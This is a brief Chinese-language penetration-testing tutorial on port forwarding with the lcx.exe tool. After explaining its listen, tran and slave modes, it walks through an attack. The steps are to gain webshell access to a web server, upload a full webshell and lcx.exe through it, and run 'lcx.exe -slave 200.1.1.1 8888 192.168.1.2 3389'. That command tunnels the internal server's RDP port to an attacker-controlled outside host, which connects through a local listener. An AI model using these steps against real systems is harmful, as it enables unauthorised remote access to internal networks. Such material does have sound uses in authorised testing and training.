渗透测试过程中的端口转发

先来介绍一下端口转发工具：lcx.exe

有三种用法：

• -listen：监听本机的某个端口，并将其转发到本机的另一个端口。
  如：lcx.exe -listen 888 999，即监听本机的 888 端口，并将其监听到的数据转发到 999 端口。

• -tran：将某个端口转发到本机任何一个地址的某个端口。
  如：lcx.exe -tran 8888 127.0.0.1 3389，即将本机的 3389 端口转发为本机任何一个地址的 8888 端口。这个可以在当某个服务只允许本机的 127.0.0.1 去访问时进行使用，当输入这条命令后，就可以通过 Web 服务器的 IP 地址或者 网站网址的某个端口进行连接服务，而不限于 127.0.0.1。

• -slave：将内网的某个主机的某个端口，转发到外网某个主机的某个端口上。lcx.exe -slave 外网IP 外网端口 内网IP 内网端口。
  如：lcx.exe -slave 200.1.1.1 888 192.168.1.2 3389，即将局域网内 IP 地址为 192.168.1.2 的 3389 端口转发到外网 IP 为 200.1.1.1 的 888 端口上，这样就可以进行连接。

---

利用端口转发连接内网服务器的 3389

假设 Web 服务器的内网 IP 为 192.168.1.2。

① 先得到 webshell 权限，上传大马。

② 通过大马，上传一个 lcx.exe 端口转发工具。lcx.exe 是一个命令行工具，需要在命令行中使用。可以在大马中的命令执行界面进行执行。

③ 执行命令：
lcx.exe -slave 200.1.1.1 8888 192.168.1.2 3389
注意：

1. 若攻击者主机是一个外网 IP，那么 200.1.1.1 处可以填写 攻击者主机的外网 IP；
2. 若攻击者的主机是在内网中，那么 200.1.1.1 处应该写攻击者与外网相连的路由器的外网 IP 地址
3. 若攻击者的主机是在内网中，那么 200.1.1.1 处也可以填写服务器与外网相连的路由器的外网 IP 地址，那么攻击者就可以通过连接 Web 服务器该路由器的 IP地址+转发后的端口(如 8888) 来连接服务器的 3389 端口

④ 若攻击者在内网中，且端口是转发到攻击者的内外网处的路由器的 IP 地址和端口上，那么需要配置该路由器的端口转发。即将转发到外网某个端口的数据转发到内网某 IP 地址的某个端口下。

⑤ 攻击者本地的主机也需要侦听：
lcx.exe -listen 1111 1311
将转发到本地 1111 端口的数据转发到 1311 上。

通过以上步骤，远程服务器的 3389 端口通过端口转发，将数据转发到了攻击者本地主机的 1111 端口；在本地侦听 1111 端口的同时，将数据又转发到了 1311 端口；那么就可以通过连接本地的 1311 端口就可以连接远程服务器。